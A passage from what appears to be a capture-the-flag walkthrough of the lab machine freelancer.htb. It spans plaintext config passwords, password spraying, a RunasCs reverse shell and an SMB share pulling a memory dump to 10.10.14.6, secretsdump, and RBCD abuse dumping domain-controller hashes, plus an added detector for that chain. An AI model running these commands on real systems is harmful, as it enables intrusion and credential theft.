0.0.0.0              636
10.129.190.213       139
127.0.0.1           8000    



Interesting Files

Doing a search for any files matching the pattern *conf* under C:\Users

C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI

[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True    





Privilege Escalation

Password Spraying

ℹ️
During the post-exploit enumeration phase, I typically explore the file system for configuration files and other such files where a username and/or password might be stored.

The .ini file found above contains some passwords that we should spray around given the usernames we've found on the system.

users.txt

Administrator    
Guest            
krbtgt           
mikasaAckerman   
sshd             
SQLBackupOperator
sql_svc          
lorra199         
maya.artmes      
michael.williams 
sdavis           
d.jones          
jen.brown        
taylor           
jmartinez        
olivia.garcia    
dthomas          
sophia.h         
Ethan.l          
wwalker          
jgreen           
evelyn.adams     
hking            
alex.hill        
samuel.turner    
ereed            
leon.sk          
carol.poland     
lkazanof
mikasaAckerman:IL0v3ErenY3ager



Lateral to mikasaAckerman

💡
Let's dump the LDAP records so we can have the data available
ldapdomaindump -u 'freelancer.htb\mikasaAckerman' -p 'IL0v3ErenY3ager' freelancer.htb
Releases · antonioCoco/RunasCs
RunasCs - Csharp and open version of windows builtin runas.exe - antonioCoco/RunasCs

We're going to use RunasCs to spawn a process as mikasaAckerman

wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip
unzip RunasCs.zip
sudo python3 -m http.server 80

Start a Python HTTP server to transfer RunasCs.exe to the target

iwr http://10.10.14.6/RunasCs.exe -o runas.exe
sudo rlwrap nc -lnvp 443

Start a listener to catch the reverse shell

.\runas.exe mikasaAckerman IL0v3ErenY3ager powershell.exe -r 10.10.14.6:443

Start powershell and send it through the socket



Memory Dump Analysis

mail.txt

Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
sudo impacket-smbserver -smb2support -username evil -password evil myshare .

Start an SMB server to transfer the memory dump locally

net use x: /user:evil \\10.10.14.6\myshare evil
Map the SMB share from Kali to X:
cp MEMORY.7z X:\



Analysis with MemProcFS

read “windows memory” dump on linux after%3A2020 -volatility - Google Search

My initial Google search for Linux tools to read Windows memory dumps

Which led me down this path
Releases · ufrisk/MemProcFS
wget https://github.com/ufrisk/MemProcFS/releases/download/v5.9/MemProcFS_files_and_binaries_v5.9.17-linux_x64-20240603.tar.gz -O MemProcFS.tar.gz
tar -xvzf MemProcFS.tar.gz
mkdir /tmp/memdump

Make a mountpoint to host the memory dump files

./memprocfs -device MEMORY.DMP -mount /tmp/memdump &

Mount the dump file and run it in the background

ℹ️
I'm running this in my Kali VM and not my Kali LXC --- kali-ct --- due to needing the fuse kernel module
impacket-secretsdump -sam /tmp/memdump/registry/hive_files/0xffffd3067d935000-SAM-MACHINE_SAM.reghive \
-system /tmp/memdump/registry/hive_files/0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive \
-security /tmp/memdump/registry/hive_files/0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive local
Time to spray the password around
nxc smb freelancer.htb -d freelancer.htb -u users.txt -p 'PWN3D#l0rr@Armessa199' --continue-on-success
lorra199:PWN3D#l0rr@Armessa199



Lateral to Lorra

Using the ldapdomaindump info from earlier, we see Lorra is in an interesting group



Bloodhound Analysis

faketime "$(ntpdate -q freelancer.htb | cut -d ' ' -f 1,2)" \
bloodhound-python -c All -u lorra199 -p 'PWN3D#l0rr@Armessa199' \
-d freelancer.htb -dc freelancer.htb -ns 10.129.190.213
sudo neo4j console &
sudo bloodhound &
Some of these queries show interesting paths to DA



Use GenericWrite to Impersonate Admin

GenericWrite | Pentesting & Red Teaming Notes
Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Notes
(RBCD) Resource-based constrained | The Hacker Recipes
🚨
Be sure to add DC.freelancer.htb to your /etc/hosts file for some of the Kerberos authentication steps
impacket-addcomputer 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199' -dc-ip 10.129.82.36

Add a computer account to the domain; we will have full control over this new account. impacket-addcomputer picks a random DESKTOP-<random>$ name and password when none are supplied, so the name and password used in the following commands must come from its own output

impacket-rbcd -delegate-to 'DC$' -delegate-from 'DESKTOP-FKOIG016$' -dc-ip 10.129.82.36 -action write 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'

Given the GenericWrite permission, we can delegate access to the DC via this computer

ℹ️
You can get the domain controller's computer name by running the hostname command, or find it in the ldapdomaindump or bloodhound output
faketime "$(ntpdate -q freelancer.htb | cut -d ' ' -f 1,2)" \
impacket-getST -spn 'cifs/DC.freelancer.htb' -impersonate Administrator \
-dc-ip 10.129.82.36 'freelancer.htb/DESKTOP-WW2TQAGV$:2SEJRGmu5RHktEm65DyUATCrAk9kiTzp'

Use S4U through our computer account to impersonate the Domain Admin and request a service ticket for cifs/DC.freelancer.htb (getST yields a service ticket, not a TGT)

💡
We use the faketime binary here, and the FQDN DC.freelancer.htb, to spoof a synchronized clock with the domain controller, since that is a requirement for Kerberos authentication
ℹ️
As noted in the output, Saving ticket in Administrator@cifs_DC.freelancer.htb@FREELANCER.HTB.ccache, we have a ticket cached that we can use to login as the Administrator to the DC
KRB5CCNAME='Administrator@cifs_DC.freelancer.htb@FREELANCER.HTB.ccache' \
faketime "$(ntpdate -q freelancer.htb | cut -d ' ' -f 1,2)" \
impacket-secretsdump -k -no-pass -dc-ip 10.129.82.36 DC.freelancer.htb
ℹ️
We point KRB5CCNAME at the cached service ticket for the duration of the command, use faketime to sync with the clock on the DC, and finally connect over SMB (CIFS) to dump hashes from the DC
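The whole escalation rests on two directory writes a domain controller can log: the new computer account (event 4741) and the write to msDS-AllowedToActOnBehalfOfOtherIdentity on DC$ (event 5136, only emitted when the object's SACL audits property writes). The correlation below is an added example (not from the original post) over constructed copies of those events; the DELEGATION_ADMINS set and the FILESRV object are assumptions for the example.

```python
"""Correlate a fresh computer account with an RBCD write on a domain controller.

Added example, not part of the original post. The chain above is: lorra199
adds a computer account (the DC logs event 4741), then writes
msDS-AllowedToActOnBehalfOfOtherIdentity on DC$ (event 5136, which is only
emitted when the object's SACL audits property writes). The check reads
constructed copies of those events (EventData field names as Windows uses
them) and raises one alert per value added to that attribute, rated high when
the writer created a computer account shortly before or is not an account
expected to manage delegation.
"""
import json
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"                 # 5136 OperationType code for "Value Added"
DELEGATION_ADMINS = {"Administrator"}   # assumption for this example


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def correlate_rbcd(lines, lookback=timedelta(hours=1)):
    """One alert per RBCD attribute write, with any computer accounts the
    same writer created within `lookback` (the addcomputer -> rbcd pattern)."""
    events = sorted((json.loads(line) for line in lines), key=_ts)
    created = []         # (time, creator, new computer name) from 4741 events
    alerts = []
    for ev in events:
        if ev["EventID"] == 4741:
            created.append((_ts(ev), ev["SubjectUserName"], ev["TargetUserName"]))
        elif (ev["EventID"] == 5136
              and ev["AttributeLDAPDisplayName"] == RBCD_ATTR
              and ev["OperationType"] == VALUE_ADDED):
            writer, when = ev["SubjectUserName"], _ts(ev)
            fresh = [name for t, who, name in created
                     if who == writer and when - lookback <= t <= when]
            suspicious = bool(fresh) or writer not in DELEGATION_ADMINS
            alerts.append({"time": ev["TimeCreated"], "target": ev["ObjectDN"],
                           "writer": writer, "new_computers": fresh,
                           "severity": "high" if suspicious else "info"})
    return alerts


def sample_events():
    """Constructed events mirroring the walkthrough's sequence, plus a benign
    delegation change and an unrelated attribute write."""
    dc_dn = "CN=DC,OU=Domain Controllers,DC=freelancer,DC=htb"
    records = [
        {"TimeCreated": "2024-06-07T03:10:00", "EventID": 4741,
         "SubjectUserName": "lorra199", "TargetUserName": "DESKTOP-FKOIG016$"},
        {"TimeCreated": "2024-06-07T03:11:30", "EventID": 5136,
         "SubjectUserName": "lorra199", "ObjectDN": dc_dn,
         "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED,
         "AttributeValue": "<security descriptor bytes elided>"},
        {"TimeCreated": "2024-06-07T09:00:00", "EventID": 5136,
         "SubjectUserName": "Administrator",
         "ObjectDN": "CN=FILESRV,CN=Computers,DC=freelancer,DC=htb",
         "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED,
         "AttributeValue": "<security descriptor bytes elided>"},
        {"TimeCreated": "2024-06-07T09:05:00", "EventID": 5136,
         "SubjectUserName": "Administrator", "ObjectDN": dc_dn,
         "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED,
         "AttributeValue": "Primary DC"},
    ]
    return [json.dumps(r) for r in records]


if __name__ == "__main__":
    for a in correlate_rbcd(sample_events()):
        print(f"[{a['severity']}] {a['time']} {a['writer']} set RBCD on "
              f"{a['target']} new computers: {a['new_computers']}")
```

Two settings make this pattern rarer: lower ms-DS-MachineAccountQuota from its default of 10 so ordinary users cannot create computer accounts, and enable Audit Directory Service Changes with a SACL on domain controller objects so the 5136 events exist to correlate.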



Becoming Domain Admin

We can use the NT hash in the secretsdump output along with evil-winrm



Flags

User

d1ee5e5d03e91167222380fbe4f8a68f    

Root

06a8a39fc5dca023405cead19cc2d9cb    